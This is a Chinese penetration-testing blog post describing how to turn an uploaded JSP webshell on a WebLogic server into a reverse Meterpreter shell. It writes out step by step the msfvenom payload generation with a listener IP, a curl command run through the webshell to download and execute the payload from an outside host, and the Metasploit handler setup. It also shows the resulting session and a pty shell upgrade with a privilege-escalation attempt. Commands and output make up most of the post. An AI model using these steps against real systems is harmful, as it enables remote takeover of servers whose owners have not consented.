<!DOCTYPE html>
<html>

    <head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="本站由哨兵安全实验室支持创办">

<link rel="shortcut icon" href="/assets/img/favicon.png">
<link type="application/atom+xml" rel="alternate" href="/feed.xml" title="©「哨兵」| Sentry Security" />



<!-- Open Graph metadata -->
<meta property="og:type" content="website" />
<meta property="og:title" content="「渗透」:一句话反弹docker-shell | ©「哨兵」| Sentry Security" />
<meta property="og:description" content="本站由哨兵安全实验室支持创办" />
<meta property="og:image" content="http://localhost:80/assets/img/logo-share.png" /> <!-- WeChat requires that thumbnail image is larger than 300x300 -->
<meta property="og:url" content="http://localhost:80/blog/2020/docker/reverse/shell/by1/" />
<title> 「渗透」:一句话反弹docker-shell | ©「哨兵」| Sentry Security | Sentrylab</title>

<link rel="stylesheet" type="text/css" href="/assets/css/pace-minimal.css">
<script src="/assets/js/pace.min.js"></script>


<!-- Bootstrap core CSS -->
<link href="/assets/css/bootstrap.css" rel="stylesheet">
<!-- Custom styles for this template -->
<link href="/assets/css/style.css" rel="stylesheet">
<link href="/assets/css/font-awesome.min.css" rel="stylesheet">
<link href="/assets/css/font-awesome-v4-shims.min.css" rel="stylesheet">
<link rel="stylesheet" href="/assets/css/404-style.css">


<script src="/assets/js/jquery.min.js"></script>
<script src="/assets/js/bootstrap.min.js"></script>




</head>


    <body>
        <!-- Fixed navbar -->
<div class="navbar navbar-default navbar-fixed-top" role="navigation">
  <div class="container">
    <div class="navbar-header">
      <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
      <a class="navbar-brand" href="/"><!--
   --><picture>
  <source srcset="/assets/img/logo-small-dark.png 1x, /assets/img/logo-small-dark@2x.png 2x, /assets/img/logo-small-dark@3x.png 3x, /assets/img/logo-small-dark@4x.png 4x" media="(prefers-color-scheme: dark)" />
  
  <img src="/assets/img/logo-small.jpg" srcset="/assets/img/logo-small.png 1x, /assets/img/logo-small@2x.png 2x, /assets/img/logo-small@3x.png 3x, /assets/img/logo-small@4x.png 4x" />
  </picture> Sentrylab</a>
    </div>
    <div class="navbar-collapse collapse navbar-right">
      <ul class="nav navbar-nav">
        <li ><a href="/">HOME</a></li>
        <li class="active"><a href="/blog/">BLOG</a></li>
        <li ><a href="/events/">EVENTS</a></li>
        <li ><a href="/categories/">CATEGORIES</a></li>
        <li ><a href="/daily/">DAILY</a></li>
        <li><a href="https://about.sentrylab.cn">ABOUT ME</a></li>
      </ul>
    </div><!--/.nav-collapse -->

  </div>
</div>

            <div class="container mtb">
    <div class="row">
        <!-- SINGLE POST -->
        <div class="col-lg-8">
            <!-- Blog Post  -->
            <a href="/blog/2020/docker/reverse/shell/by1/"><h3 class="ctitle">「渗透」:一句话反弹docker-shell</h3></a>
            <p><csmall>Apr 27, 2020. |  By: Bin4xin.</csmall></p>
            <div class="post-content"> 
            <blockquote>
  <p>一句话木马反弹shell</p>
</blockquote>

<p>前提：现在情况是已经上传了一句话木马，可以执行命令如：ls,pwd,whoami等；问题在于，不管用<code class="language-plaintext highlighter-rouge">python</code>、<code class="language-plaintext highlighter-rouge">bash</code>还是<code class="language-plaintext highlighter-rouge">perl</code>都反弹不了，偷不了懒，就上msf把。</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">http</span><span class="p">:</span><span class="c1">//target-ip/where/muma/path/are/1587808279743_shell.jsp?pwd=admin&amp;cmd=pwd</span>
<span class="o">/</span><span class="nx">u01</span><span class="o">/</span><span class="nx">oracle</span><span class="o">/</span><span class="nx">user_projects</span><span class="o">/</span><span class="nx">domains</span><span class="o">/</span><span class="nx">base_domain</span>
<span class="nx">http</span><span class="p">:</span><span class="c1">//target-ip/where/muma/path/are/1587808279743_shell.jsp?pwd=admin&amp;cmd=whoami</span>
<span class="nx">oracle</span>
</code></pre></div></div>

<h4 id="msf生成shell文件">msf生成shell文件</h4>
<p><code class="language-plaintext highlighter-rouge">msfvenom</code>先生成反弹shell文件，赋权。</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">root</span><span class="p">@</span><span class="nd">iZj6cgn7odv59wmjjhe6zwZ</span><span class="p">:</span><span class="o">~</span><span class="err">##</span> <span class="nx">msfvenom</span> <span class="o">-</span><span class="nx">p</span> <span class="nx">linux</span><span class="o">/</span><span class="nx">x64</span><span class="o">/</span><span class="nx">meterpreter_reverse_tcp</span> <span class="nx">LHOST</span><span class="o">=</span><span class="mf">47.52</span><span class="p">.</span><span class="mf">233.92</span> <span class="nx">LPORT</span><span class="o">=</span><span class="mi">1234</span> <span class="o">-</span><span class="nx">f</span> <span class="nx">elf</span> <span class="o">&gt;</span> <span class="nx">shell</span><span class="p">.</span><span class="nx">elf</span>
<span class="p">[</span><span class="o">-</span><span class="p">]</span> <span class="nx">No</span> <span class="nx">platform</span> <span class="nx">was</span> <span class="nx">selected</span><span class="p">,</span> <span class="nx">choosing</span> <span class="nx">Msf</span><span class="p">::</span><span class="nx">Module</span><span class="p">::</span><span class="nx">Platform</span><span class="p">::</span><span class="nx">Linux</span> <span class="k">from</span> <span class="nx">the</span> <span class="nx">payload</span>
<span class="p">[</span><span class="o">-</span><span class="p">]</span> <span class="nx">No</span> <span class="nx">arch</span> <span class="nx">selected</span><span class="p">,</span> <span class="nx">selecting</span> <span class="nx">arch</span><span class="p">:</span> <span class="nx">x64</span> <span class="k">from</span> <span class="nx">the</span> <span class="nx">payload</span>
<span class="nx">No</span> <span class="nx">encoder</span> <span class="nx">or</span> <span class="nx">badchars</span> <span class="nx">specified</span><span class="p">,</span> <span class="nx">outputting</span> <span class="nx">raw</span> <span class="nx">payload</span>
<span class="nx">Payload</span> <span class="nx">size</span><span class="p">:</span> <span class="mi">1046632</span> <span class="nx">bytes</span>
<span class="nx">Final</span> <span class="nx">size</span> <span class="k">of</span> <span class="nx">elf</span> <span class="nx">file</span><span class="p">:</span> <span class="mi">1046632</span> <span class="nx">bytes</span>
<span class="nx">root</span><span class="p">@</span><span class="nd">iZj6cgn7odv59wmjjhe6zwZ</span><span class="p">:</span><span class="o">~</span><span class="err">##</span> <span class="nx">chmod</span> <span class="mi">777</span> <span class="nx">shell</span><span class="p">.</span><span class="nx">elf</span>
</code></pre></div></div>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">http</span><span class="p">:</span><span class="c1">//target-ip/where/muma/path/are/1587808279743_shell.jsp?pwd=admin&amp;cmd=ls</span>
<span class="nx">测试一下一句话木马</span><span class="err">，</span><span class="nx">是可以执行命令的</span><span class="err">：</span>
<span class="nx">total</span> <span class="mi">1100</span>
<span class="nx">drwxr</span><span class="o">-</span><span class="nx">x</span><span class="o">---</span> <span class="mi">15</span> <span class="nx">oracle</span> <span class="nx">oracle</span>    <span class="mi">4096</span> <span class="nx">Apr</span> <span class="mi">27</span> <span class="mi">08</span><span class="p">:</span><span class="mi">06</span> <span class="p">.</span>
<span class="nx">drwxr</span><span class="o">-</span><span class="nx">x</span><span class="o">---</span>  <span class="mi">3</span> <span class="nx">oracle</span> <span class="nx">oracle</span>    <span class="mi">4096</span> <span class="nx">Apr</span> <span class="mi">25</span> <span class="mi">00</span><span class="p">:</span><span class="mi">23</span> <span class="p">..</span>
<span class="nx">drwxr</span><span class="o">-</span><span class="nx">x</span><span class="o">---</span>  <span class="mi">2</span> <span class="nx">oracle</span> <span class="nx">oracle</span>    <span class="mi">4096</span> <span class="nx">Apr</span> <span class="mi">25</span> <span class="mi">00</span><span class="p">:</span><span class="mi">23</span> <span class="nx">autodeploy</span>
<span class="nx">drwxr</span><span class="o">-</span><span class="nx">x</span><span class="o">---</span>  <span class="mi">6</span> <span class="nx">oracle</span> <span class="nx">oracle</span>    <span class="mi">4096</span> <span class="nx">Apr</span> <span class="mi">25</span> <span class="mi">00</span><span class="p">:</span><span class="mi">23</span> <span class="nx">bin</span>
<span class="nx">drwxr</span><span class="o">-</span><span class="nx">x</span><span class="o">---</span>  <span class="mi">3</span> <span class="nx">oracle</span> <span class="nx">oracle</span>    <span class="mi">4096</span> <span class="nx">Apr</span> <span class="mi">25</span> <span class="mi">00</span><span class="p">:</span><span class="mi">23</span> <span class="nx">common</span>
<span class="nx">drwxr</span><span class="o">-</span><span class="nx">x</span><span class="o">---</span>  <span class="mi">9</span> <span class="nx">oracle</span> <span class="nx">oracle</span>    <span class="mi">4096</span> <span class="nx">Apr</span> <span class="mi">25</span> <span class="mi">00</span><span class="p">:</span><span class="mi">24</span> <span class="nx">config</span>
<span class="nx">drwxr</span><span class="o">-</span><span class="nx">x</span><span class="o">---</span>  <span class="mi">2</span> <span class="nx">oracle</span> <span class="nx">oracle</span>    <span class="mi">4096</span> <span class="nx">Apr</span> <span class="mi">25</span> <span class="mi">00</span><span class="p">:</span><span class="mi">23</span> <span class="nx">console</span><span class="o">-</span><span class="nx">ext</span>
<span class="o">-</span><span class="nx">rw</span><span class="o">-</span><span class="nx">r</span><span class="o">-----</span>  <span class="mi">1</span> <span class="nx">oracle</span> <span class="nx">oracle</span>     <span class="mi">234</span> <span class="nx">Apr</span> <span class="mi">25</span> <span class="mi">00</span><span class="p">:</span><span class="mi">23</span> <span class="nx">derby</span><span class="p">.</span><span class="nx">log</span>
<span class="o">-</span><span class="nx">rw</span><span class="o">-</span><span class="nx">r</span><span class="o">-----</span>  <span class="mi">1</span> <span class="nx">oracle</span> <span class="nx">oracle</span>     <span class="mi">257</span> <span class="nx">Apr</span> <span class="mi">25</span> <span class="mi">00</span><span class="p">:</span><span class="mi">24</span> <span class="nx">edit</span><span class="p">.</span><span class="nx">lok</span>
<span class="o">-</span><span class="nx">rw</span><span class="o">-</span><span class="nx">r</span><span class="o">-----</span>  <span class="mi">1</span> <span class="nx">oracle</span> <span class="nx">oracle</span>     <span class="mi">327</span> <span class="nx">Jul</span> <span class="mi">19</span>  <span class="mi">2017</span> <span class="nx">fileRealm</span><span class="p">.</span><span class="nx">properties</span>
<span class="nx">drwxr</span><span class="o">-</span><span class="nx">x</span><span class="o">---</span>  <span class="mi">3</span> <span class="nx">oracle</span> <span class="nx">oracle</span>    <span class="mi">4096</span> <span class="nx">Apr</span> <span class="mi">25</span> <span class="mi">00</span><span class="p">:</span><span class="mi">23</span> <span class="nx">init</span><span class="o">-</span><span class="nx">info</span>
<span class="nx">drwxr</span><span class="o">-</span><span class="nx">x</span><span class="o">---</span>  <span class="mi">2</span> <span class="nx">oracle</span> <span class="nx">oracle</span>    <span class="mi">4096</span> <span class="nx">Apr</span> <span class="mi">25</span> <span class="mi">00</span><span class="p">:</span><span class="mi">23</span> <span class="nx">lib</span>
<span class="nx">drwxr</span><span class="o">-</span><span class="nx">x</span><span class="o">---</span>  <span class="mi">2</span> <span class="nx">oracle</span> <span class="nx">oracle</span>    <span class="mi">4096</span> <span class="nx">Apr</span> <span class="mi">25</span> <span class="mi">00</span><span class="p">:</span><span class="mi">23</span> <span class="nx">nodemanager</span>
<span class="nx">drwxr</span><span class="o">-</span><span class="nx">x</span><span class="o">---</span>  <span class="mi">3</span> <span class="nx">oracle</span> <span class="nx">oracle</span>    <span class="mi">4096</span> <span class="nx">Apr</span> <span class="mi">25</span> <span class="mi">00</span><span class="p">:</span><span class="mi">23</span> <span class="nx">orchestration</span>
<span class="nx">drwxr</span><span class="o">-</span><span class="nx">x</span><span class="o">---</span>  <span class="mi">2</span> <span class="nx">oracle</span> <span class="nx">oracle</span>    <span class="mi">4096</span> <span class="nx">Apr</span> <span class="mi">26</span> <span class="mi">01</span><span class="p">:</span><span class="mi">39</span> <span class="nx">original</span>
<span class="nx">drwxr</span><span class="o">-</span><span class="nx">x</span><span class="o">---</span>  <span class="mi">2</span> <span class="nx">oracle</span> <span class="nx">oracle</span>    <span class="mi">4096</span> <span class="nx">Apr</span> <span class="mi">25</span> <span class="mi">00</span><span class="p">:</span><span class="mi">23</span> <span class="nx">security</span>
<span class="nx">drwxr</span><span class="o">-</span><span class="nx">x</span><span class="o">---</span>  <span class="mi">3</span> <span class="nx">oracle</span> <span class="nx">oracle</span>    <span class="mi">4096</span> <span class="nx">Apr</span> <span class="mi">25</span> <span class="mi">00</span><span class="p">:</span><span class="mi">23</span> <span class="nx">servers</span>
<span class="o">-</span><span class="nx">rwxr</span><span class="o">-</span><span class="nx">x</span><span class="o">---</span>  <span class="mi">1</span> <span class="nx">oracle</span> <span class="nx">oracle</span>     <span class="mi">261</span> <span class="nx">Apr</span> <span class="mi">25</span> <span class="mi">00</span><span class="p">:</span><span class="mi">23</span> <span class="nx">startWebLogic</span><span class="p">.</span><span class="nx">sh</span>
<span class="nx">drwxr</span><span class="o">-</span><span class="nx">x</span><span class="o">---</span>  <span class="mi">3</span> <span class="nx">oracle</span> <span class="nx">oracle</span>    <span class="mi">4096</span> <span class="nx">Apr</span> <span class="mi">25</span> <span class="mi">09</span><span class="p">:</span><span class="mi">49</span> <span class="nx">tmp</span>
</code></pre></div></div>

<h4 id="下载shell文件执行">下载shell文件执行</h4>
<p>在一句话木马上执行下载命令，<code class="language-plaintext highlighter-rouge">Wget</code>和<code class="language-plaintext highlighter-rouge">Curl</code>都可以，一般linux机器上都自带下载工具</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://target-ip/where/muma/path/are/1587808279743_shell.jsp?pwd=admin&amp;cmd=curl -o shell.elf http://ip/shell.elf
等待下载完毕；继续赋权
chmod 777 shell.elf
在查看一下：
total 1100
drwxr-x--- 15 oracle oracle    4096 Apr 27 08:06 .
drwxr-x---  3 oracle oracle    4096 Apr 25 00:23 ..
drwxr-x---  2 oracle oracle    4096 Apr 25 00:23 autodeploy
drwxr-x---  6 oracle oracle    4096 Apr 25 00:23 bin
drwxr-x---  3 oracle oracle    4096 Apr 25 00:23 common
drwxr-x---  9 oracle oracle    4096 Apr 25 00:24 config
drwxr-x---  2 oracle oracle    4096 Apr 25 00:23 console-ext
-rw-r-----  1 oracle oracle     234 Apr 25 00:23 derby.log
-rw-r-----  1 oracle oracle     257 Apr 25 00:24 edit.lok
-rw-r-----  1 oracle oracle     327 Jul 19  2017 fileRealm.properties
drwxr-x---  3 oracle oracle    4096 Apr 25 00:23 init-info
drwxr-x---  2 oracle oracle    4096 Apr 25 00:23 lib
drwxr-x---  2 oracle oracle    4096 Apr 25 00:23 nodemanager
drwxr-x---  3 oracle oracle    4096 Apr 25 00:23 orchestration
drwxr-x---  2 oracle oracle    4096 Apr 26 01:39 original
drwxr-x---  2 oracle oracle    4096 Apr 25 00:23 security
drwxr-x---  3 oracle oracle    4096 Apr 25 00:23 servers
-rwxrwxrwx  1 oracle oracle 1046632 Apr 27 08:06 shell.elf
-rwxr-x---  1 oracle oracle     261 Apr 25 00:23 startWebLogic.sh
drwxr-x---  3 oracle oracle    4096 Apr 25 09:49 tmp
</code></pre></div></div>

<h4 id="shell流量接入">shell流量接入</h4>
<p>我们发现已经成功下载了反弹shell的msf文件，直接执行
<code class="language-plaintext highlighter-rouge">http://target-ip/where/muma/path/are/1587808279743_shell.jsp?pwd=admin&amp;cmd=./shell.elf</code>，执行前别忘了在服务器上监听端口。</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="err">#</span> <span class="nx">msfconsole</span>
<span class="nx">msf5</span> <span class="o">&gt;</span> <span class="nx">use</span> <span class="nx">exploit</span><span class="o">/</span><span class="nx">multi</span><span class="o">/</span><span class="nx">handler</span>
<span class="nx">msf5</span> <span class="nx">exploit</span><span class="p">(</span><span class="nx">multi</span><span class="o">/</span><span class="nx">handler</span><span class="p">)</span> <span class="o">&gt;</span> <span class="kd">set</span> <span class="nx">PAYLOAD</span> <span class="nx">linux</span><span class="o">/</span><span class="nx">x64</span><span class="o">/</span><span class="nx">meterpreter_reverse_tcp</span>
<span class="nx">PAYLOAD</span> <span class="o">=&gt;</span> <span class="nx">linux</span><span class="o">/</span><span class="nx">x64</span><span class="o">/</span><span class="nx">meterpreter_reverse_tcp</span>
<span class="nx">msf5</span> <span class="nx">exploit</span><span class="p">(</span><span class="nx">multi</span><span class="o">/</span><span class="nx">handler</span><span class="p">)</span> <span class="o">&gt;</span> <span class="kd">set</span> <span class="nx">LHOST</span> <span class="mf">0.0</span><span class="p">.</span><span class="mf">0.0</span>
<span class="nx">LHOST</span> <span class="o">=&gt;</span> <span class="mf">0.0</span><span class="p">.</span><span class="mf">0.0</span>
<span class="nx">msf5</span> <span class="nx">exploit</span><span class="p">(</span><span class="nx">multi</span><span class="o">/</span><span class="nx">handler</span><span class="p">)</span> <span class="o">&gt;</span> <span class="kd">set</span> <span class="nx">LPORT</span> <span class="mi">1234</span>
<span class="nx">LPORT</span> <span class="o">=&gt;</span> <span class="mi">1234</span>
<span class="nx">msf5</span> <span class="nx">exploit</span><span class="p">(</span><span class="nx">multi</span><span class="o">/</span><span class="nx">handler</span><span class="p">)</span> <span class="o">&gt;</span> <span class="nx">run</span>

<span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="nx">Started</span> <span class="nx">reverse</span> <span class="nx">TCP</span> <span class="nx">handler</span> <span class="nx">on</span> <span class="mf">0.0</span><span class="p">.</span><span class="mf">0.0</span><span class="p">:</span><span class="mi">1234</span>

</code></pre></div></div>
<p>执行完就可以看到建立连接的流量接入了：</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="nx">Meterpreter</span> <span class="nx">session</span> <span class="mi">1</span> <span class="nx">opened</span> <span class="p">(</span><span class="mf">172.31</span><span class="p">.</span><span class="mf">116.237</span><span class="p">:</span><span class="mi">1234</span> <span class="o">-&gt;</span> <span class="mf">59.110</span><span class="p">.</span><span class="mf">152.168</span><span class="p">:</span><span class="mi">44832</span><span class="p">)</span> <span class="nx">at</span> <span class="mi">2020</span><span class="o">-</span><span class="mi">04</span><span class="o">-</span><span class="mi">27</span> <span class="mi">16</span><span class="p">:</span><span class="mi">08</span><span class="p">:</span><span class="mi">48</span> <span class="o">+</span><span class="mi">0800</span>
</code></pre></div></div>
<p>下一步：</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">meterpreter</span> <span class="o">&gt;</span> <span class="nx">shell</span>
<span class="nx">Process</span> <span class="mi">460</span> <span class="nx">created</span><span class="p">.</span>
<span class="nx">Channel</span> <span class="mi">1</span> <span class="nx">created</span><span class="p">.</span>
<span class="nx">whoami</span>
<span class="nx">oracle</span>
<span class="nx">python</span> <span class="o">-</span><span class="nx">c</span> <span class="dl">'</span><span class="s1">import pty;pty.spawn("/bin/sh")</span><span class="dl">'</span>
<span class="nx">sh</span><span class="o">-</span><span class="mf">4.2</span><span class="nx">$</span> <span class="nx">whoami</span>
<span class="nx">whoami</span>
<span class="nx">oracle</span>
<span class="nx">sh</span><span class="o">-</span><span class="mf">4.2</span><span class="nx">$</span> <span class="nx">sudo</span> <span class="nx">su</span>
<span class="nx">sudo</span> <span class="nx">su</span>
<span class="nx">sh</span><span class="p">:</span> <span class="nx">sudo</span><span class="p">:</span> <span class="nx">command</span> <span class="nx">not</span> <span class="nx">found</span>
<span class="nx">python</span> <span class="o">-</span><span class="nx">c</span> <span class="dl">'</span><span class="s1">import pty;pty.spawn("/bin/bash")</span><span class="dl">'</span>
<span class="p">[</span><span class="nx">oracle</span><span class="p">@</span><span class="nd">5c6fe690ac22</span> <span class="nx">base_domain</span><span class="p">]</span><span class="nx">$</span> <span class="nx">pwd</span>
<span class="nx">pwd</span>
<span class="o">/</span><span class="nx">u01</span><span class="o">/</span><span class="nx">oracle</span><span class="o">/</span><span class="nx">user_projects</span><span class="o">/</span><span class="nx">domains</span><span class="o">/</span><span class="nx">base_domain</span>
<span class="p">[</span><span class="nx">oracle</span><span class="p">@</span><span class="nd">5c6fe690ac22</span> <span class="nx">base_domain</span><span class="p">]</span><span class="nx">$</span> <span class="nx">ls</span>
<span class="nx">ls</span>
<span class="nx">autodeploy</span>  <span class="nx">console</span><span class="o">-</span><span class="nx">ext</span>           <span class="nx">init</span><span class="o">-</span><span class="nx">info</span>      <span class="nx">original</span>   <span class="nx">startWebLogic</span><span class="p">.</span><span class="nx">sh</span>
<span class="nx">bin</span>         <span class="nx">derby</span><span class="p">.</span><span class="nx">log</span>             <span class="nx">lib</span>            <span class="nx">security</span>   <span class="nx">tmp</span>
<span class="nx">common</span>      <span class="nx">edit</span><span class="p">.</span><span class="nx">lok</span>              <span class="nx">nodemanager</span>    <span class="nx">servers</span>
<span class="nx">config</span>      <span class="nx">fileRealm</span><span class="p">.</span><span class="nx">properties</span>  <span class="nx">orchestration</span>  <span class="nx">shell</span><span class="p">.</span><span class="nx">elf</span>
<span class="p">[</span><span class="nx">oracle</span><span class="p">@</span><span class="nd">5c6fe690ac22</span> <span class="nx">base_domain</span><span class="p">]</span><span class="nx">$</span> <span class="nx">uname</span> <span class="o">-</span><span class="nx">a</span>
<span class="nx">uname</span> <span class="o">-</span><span class="nx">a</span>
<span class="nx">Linux</span> <span class="mi">5</span><span class="nx">c6fe690ac22</span> <span class="mf">3.10</span><span class="p">.</span><span class="mi">0</span><span class="o">-</span><span class="mf">1062.12</span><span class="p">.</span><span class="mi">1</span><span class="p">.</span><span class="nx">el7</span><span class="p">.</span><span class="nx">x86_64</span> <span class="err">##</span><span class="mi">1</span> <span class="nx">SMP</span> <span class="nx">Tue</span> <span class="nx">Feb</span> <span class="mi">4</span> <span class="mi">23</span><span class="p">:</span><span class="mi">02</span><span class="p">:</span><span class="mi">59</span> <span class="nx">UTC</span> <span class="mi">2020</span> <span class="nx">x86_64</span> <span class="nx">x86_64</span> <span class="nx">x86_64</span> <span class="nx">GNU</span><span class="o">/</span><span class="nx">Linux</span>
</code></pre></div></div>
<p>以上。</p>

            </div>
            <div class="spacing"></div>
            <div>
	<div class="hline"></div>
	<h3><em>#</em> 申明</h3>
	<div class="spacing"></div>
	<h4><em>By: Bin4xin.</em></h4>
	<h4>转载请申明本文链接：<a href="/blog/2020/docker/reverse/shell/by1/" target="_blank"> 「渗透」:一句话反弹docker-shell</a></h4>

	<h3><em># Any Questions</em></h3>
	<div class="spacing"></div>
	<h4> >_ 对本文进行提问：<a href="https://github.com/Bin4xin/bin4xin.github.io/issues/new?permalink=https://github.com/Bin4xin/bin4xin.github.io/blob/1b4fffa6232dc6ffa2cece8be0d6c39e0c5f9cfe/blog/2020/docker/reverse/shell/by1/index.html%23L84" target="_blank"> <em><li class="fa fa-github"></li> Reference in new issue.</em></a></h4>

	<h4> >_ 对本文进行留言：<a href="https://github.com/Bin4xin/bin4xin.github.io/issues/new?permalink=https://bin4xin.github.io/blog/2020/docker/reverse/shell/by1/" target="_blank"> <em><li class="fa fa-github"></li> Leave a Comment.</em></a></h4>
	<div class="spacing"></div>
</div>
        </div><!--/col-lg-8 -->
        
        <div class="col-lg-3">
    <h4>Subscribe/订阅</h4>
    <div class="hline"></div>
        <p>
        <p class="rss-subscribe"><i class="fa fa-rss"></i> Subscribe to this blog <a href="/feed.xml">via RSS</a>.</p>
        </p>
    <div class="spacing"></div>
    <h4>Categories/分类目录</h4>
    <div class="hline"></div>
        
        <div class="post-meta mb-3">
        <div class="spacing"></div>
<!--          <i class="far fa-folder-open fa-fw mr-1"></i>-->
<!--          -->
<!--            <a href='/blog/'>blog</a>-->
<!---->
<!--          -->
<!--            <a href='/docker/'>docker</a>-->
<!---->
<!--          -->
<!--            <a href='/web/'>Web</a>-->
<!---->
<!--          -->
<!--            <a href='/%E6%B8%97%E9%80%8F/'>渗透</a>-->
<!---->
<!--          -->
            <details>
                <summary class="point">本文分类</summary>
                
                <p>
                    <i class="far fa-folder fa-fw mr-1"></i> <a href='/blog/'>blog</a><!--                    <span class="badge badge-theme pull-right">0</span>-->
                </p>
                
                <p>
                    <i class="far fa-folder fa-fw mr-1"></i> <a href='/docker/'>docker</a><!--                    <span class="badge badge-theme pull-right">0</span>-->
                </p>
                
                <p>
                    <i class="far fa-folder fa-fw mr-1"></i> <a href='/Web/'>Web</a><!--                    <span class="badge badge-theme pull-right">0</span>-->
                </p>
                
                <p>
                    <i class="far fa-folder fa-fw mr-1"></i> <a href='/%E6%B8%97%E9%80%8F/'>渗透</a><!--                    <span class="badge badge-theme pull-right">0</span>-->
                </p>
                
            </details>
        </div>
        
        <p>
    <details>
        <summary class="point">所有标签/数量</summary>
        
        <p>
            <i class="fa fa-angle-right"></i> Web
            <span class="badge badge-theme pull-right">11</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 漏洞复现
            <span class="badge badge-theme pull-right">9</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 渗透
            <span class="badge badge-theme pull-right">8</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Vulnhub
            <span class="badge badge-theme pull-right">6</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 安全工具
            <span class="badge badge-theme pull-right">5</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 笔记
            <span class="badge badge-theme pull-right">32</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 软件移植
            <span class="badge badge-theme pull-right">2</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Arm
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 主动防御
            <span class="badge badge-theme pull-right">2</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 技巧
            <span class="badge badge-theme pull-right">3</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Android reverse
            <span class="badge badge-theme pull-right">4</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 排错
            <span class="badge badge-theme pull-right">3</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Waf
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Maven
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Python
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Terminal
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Docker
            <span class="badge badge-theme pull-right">3</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Cve
            <span class="badge badge-theme pull-right">3</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Sql-inject
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Bash
            <span class="badge badge-theme pull-right">2</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 内网
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 信息搜集
            <span class="badge badge-theme pull-right">6</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Fuzz
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Vulnhub
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Src
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Daily
            <span class="badge badge-theme pull-right">2</span>
        </p>
    
    </details>
    <div class="spacing"></div>

    <h4>Tags/标签</h4>
    <div class="hline"></div>
    <p>
        
            <a class="btn btn-theme" href='/' role="button">Web (11)</a>
        
            <a class="btn btn-theme" href='/' role="button">漏洞复现 (9)</a>
        
            <a class="btn btn-theme" href='/' role="button">渗透 (8)</a>
        
            <a class="btn btn-theme" href='/' role="button">Vulnhub (6)</a>
        
            <a class="btn btn-theme" href='/' role="button">安全工具 (5)</a>
        
            <a class="btn btn-theme" href='/' role="button">笔记 (32)</a>
        
            <a class="btn btn-theme" href='/' role="button">软件移植 (2)</a>
        
            <a class="btn btn-theme" href='/' role="button">Arm (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">主动防御 (2)</a>
        
            <a class="btn btn-theme" href='/' role="button">技巧 (3)</a>
        
            <a class="btn btn-theme" href='/' role="button">Android reverse (4)</a>
        
            <a class="btn btn-theme" href='/' role="button">排错 (3)</a>
        
            <a class="btn btn-theme" href='/' role="button">Waf (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Maven (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Python (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Terminal (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Docker (3)</a>
        
            <a class="btn btn-theme" href='/' role="button">Cve (3)</a>
        
            <a class="btn btn-theme" href='/' role="button">Sql-inject (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Bash (2)</a>
        
            <a class="btn btn-theme" href='/' role="button">内网 (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">信息搜集 (6)</a>
        
            <a class="btn btn-theme" href='/' role="button">Fuzz (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Vulnhub (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Src (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Daily (2)</a>
        
    </p>
    <div class="spacing"></div>

    <h4>Article Directory/文章目录</h4>
    <div class="hline"></div>
    <p>
        <ul id="toc" class="section-nav">
<li class="toc-entry toc-h4"><a href="#msf生成shell文件">msf生成shell文件</a></li>
